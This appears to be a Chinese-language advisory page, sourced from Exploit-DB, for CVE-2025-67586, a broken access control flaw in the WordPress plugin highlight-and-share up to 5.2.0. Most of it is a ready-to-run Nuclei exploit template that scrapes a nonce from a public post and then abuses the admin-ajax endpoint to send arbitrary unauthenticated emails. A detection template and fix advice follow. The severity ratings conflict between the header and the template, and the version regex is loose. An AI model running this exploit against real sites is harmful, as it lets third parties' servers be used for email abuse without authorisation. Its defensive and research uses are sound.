[webapps] WordPress Plugin 5.2.0 - Broken Access Control
CVE-2025-67586
WordPress插件5.2.0存在访问控制绕过漏洞
High · CVSS 7.5📋 漏洞基础信息
| CVE | CVE-2025-67586 |
|---|---|
| 漏洞类型 | Broken Access Control |
| 受影响版本 | WordPress Plugin 5.2.0 |
| 危害等级 | High · CVSS 7.5 |
| 发布日期 | 2026-04-22 |
| 提交者 | Zeeshan Haider |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
插件在敏感操作端点缺少有效的权限校验或nonce验证,依赖不可信的用户输入进行授权决策,导致低权限用户可执行需高权限的功能。
🎯 攻击场景
1. 攻击者拥有订阅者或更低权限账户。 2. 向存在缺陷的AJAX/REST端点发送精心构造的请求,其中包含目标操作参数。 3. 服务器未校验当前用户身份与请求操作的授权关系,直接执行操作。 4. 成功修改或访问仅限管理员的功能,如修改设置、导出数据等。
💥 漏洞影响
权限提升、未授权数据访问与修改、敏感信息泄露,严重时可导致站点完全接管。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2025-67586-exploit
info:
name: WordPress Plugin highlight-and-share <= 5.2.0 - Broken Access Control Exploit
author: Zeeshan Haider
severity: medium
description: |
This exploit sends an unauthenticated email using the highlight-and-share plugin's AJAX endpoint.
It first extracts a valid nonce and post ID from a public WordPress post, then reuses them to send arbitrary emails.
reference:
- https://www.exploit-db.com/
tags: wordpress,cve,cve2025,unauth
# 注意:未经授权发送邮件可能导致滥用,请仅在授权测试中使用
variables:
post_url: "{{BaseURL}}/?p=1" # 默认测试文章,用户可修改
to_email: "attacker@example.com"
subject: "PoC"
share_text: "Poc test"
http:
- raw:
- |
GET {{post_url}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
extractors:
# 提取 post_id: 通常出现在 article 元素的 id 或 data-post_id 属性
- type: regex
part: body
name: post_id
internal: true
regex: 'post-(\d+)'
# 也尝试从 URL 参数中提取
- type: regex
part: body
name: post_id
internal: true
regex: '\?p=(\d+)'
group: 1
# 提取 nonce: 尝试多种可能的 JS 变量或 data 属性
- type: regex
part: body
name: has_email_nonce
internal: true
regex: 'hasEmailNonce[\s]*[:=][\s]*["\']([a-f0-9]+)["\']'
group: 1
- type: regex
part: body
name: has_email_nonce
internal: true
regex: 'data-nonce=["\']([a-f0-9]+)["\']'
group: 1
- type: regex
part: body
name: has_email_nonce
internal: true
regex: '_wpnonce=([a-f0-9]+)'
group: 1
# 如果提取失败,回退到用户提供的 nonce 和 post_id(可以通过变量覆盖)
# 但此处我们继续执行第二步,如果缺少变量可能失败
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
action=has_email_form_submission&formData[postId]={{post_id}}&formData[permalink]={{BaseURL}}/?p={{post_id}}&formData[nonce]={{has_email_nonce}}&formData[toEmail]={{to_email}}&formData[subject]={{subject}}&formData[shareText]={{share_text}}&formData[emailShareType]=selection
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"success":true'
- '"message_title"'
- '"This post has been shared!"'
condition: and
extractors:
- type: json
part: body
json:
- ".data.message_body"
- ".data.message_subject"
name: exploit_result🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2025-67586-detection
info:
name: WordPress Plugin highlight-and-share <= 5.2.0 - Broken Access Control Detection
author: Zeeshan Haider
severity: medium
description: |
A broken access control vulnerability exists in the highlight-and-share plugin for WordPress.
This template detects if the vulnerable version of the plugin is installed by checking the readme.txt file.
reference:
- https://www.exploit-db.com/
tags: wordpress,cve,cve2025
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/highlight-and-share/readme.txt"
matchers-condition: and
matchers:
- type: word
words:
- "highlight-and-share"
part: body
- type: regex
part: body
regex: 'Stable tag:\s*5\.2\.0'
condition: or
# 同时匹配低于5.2.0的版本(例如5.1.x, 5.0.x 等)
- type: regex
part: body
regex: 'Stable tag:\s*5\.\d+\.\d+' # 匹配5.x.x
condition: or
- type: regex
part: body
regex: 'Stable tag:\s*4\.\d+\.\d+' # 匹配4.x.x(旧版本)
condition: or
extractors:
- type: regex
part: body
group: 1
regex: 'Stable tag:\s*([0-9]+\.[0-9]+(\.[0-9]+)?)'
internal: true
name: plugin_version🛡️ 修复建议
升级至安全版本;若无补丁,对受影响功能添加current_user_can权限检查和wp_nonce验证,禁用未使用的端点。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-06 17:40 | 来源: Exploit-DB